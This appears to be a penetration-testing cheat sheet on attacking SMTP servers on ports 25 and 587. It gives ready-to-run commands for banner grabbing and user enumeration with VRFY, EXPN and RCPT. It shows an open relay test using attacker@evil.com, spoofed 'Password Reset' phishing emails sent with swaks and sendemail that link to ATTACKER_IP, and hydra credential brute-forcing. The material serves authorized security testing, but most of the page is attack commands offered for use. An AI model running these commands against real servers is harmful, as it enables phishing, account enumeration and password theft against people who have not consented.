> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 25 / 587 - SMTP

> SMTP enumeration: user verification with VRFY/EXPN/RCPT, open relay detection, and credential brute-force.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 25,587 TARGET
```

### Banner Grab

```bash theme={"dark"}
nc -nv TARGET 25
```

***

## User Enumeration

### VRFY

```bash theme={"dark"}
nc -nv TARGET 25
VRFY root
VRFY admin
VRFY user
```

`250` = exists/verified, `550` = doesn't exist. `252` means the server can't verify (uncertain / VRFY disabled) — not a positive confirmation.

### EXPN (Mailing List)

```bash theme={"dark"}
EXPN admin
```

### RCPT TO

```bash theme={"dark"}
HELO test
MAIL FROM:<test@test.com>
RCPT TO:<admin@target.com>
```

`250` = valid, `550` = invalid.

### Automated — smtp-user-enum

```bash theme={"dark"}
smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET
```

### Nmap

```bash theme={"dark"}
nmap -p 25 --script smtp-enum-users TARGET
```

***

## Open Relay Detection

```bash theme={"dark"}
nmap -p 25 --script smtp-open-relay TARGET
```

### Manual Check

```bash theme={"dark"}
nc -nv TARGET 25
HELO test
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@external.com>
DATA
Subject: Test
Test message
.
QUIT
```

If `250 OK` after DATA → open relay.

***

## Send Email (Phishing / Spoofing)

### swaks

```bash theme={"dark"}
swaks --to victim@target.com --from admin@target.com --server TARGET --header "Subject: Password Reset" --body "Click here: http://ATTACKER_IP/phish"
```

### sendemail

```bash theme={"dark"}
sendemail -t victim@target.com -f admin@target.com -s TARGET -u "Password Reset" -m "Click http://ATTACKER_IP"
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt smtp://TARGET
hydra -L users.txt -P passwords.txt smtp://TARGET -s 587
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 25 --script smtp-commands TARGET
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} TARGET
nmap -p 25 --script smtp-vuln* TARGET
```

***

## Quick Reference

| Check            | Command                                          |
| ---------------- | ------------------------------------------------ |
| User enum (VRFY) | `smtp-user-enum -M VRFY -U users.txt -t TARGET`  |
| Open relay       | `nmap --script smtp-open-relay TARGET`           |
| Send email       | `swaks --to victim --from admin --server TARGET` |
| Brute-force      | `hydra -L users.txt -P pass.txt smtp://TARGET`   |
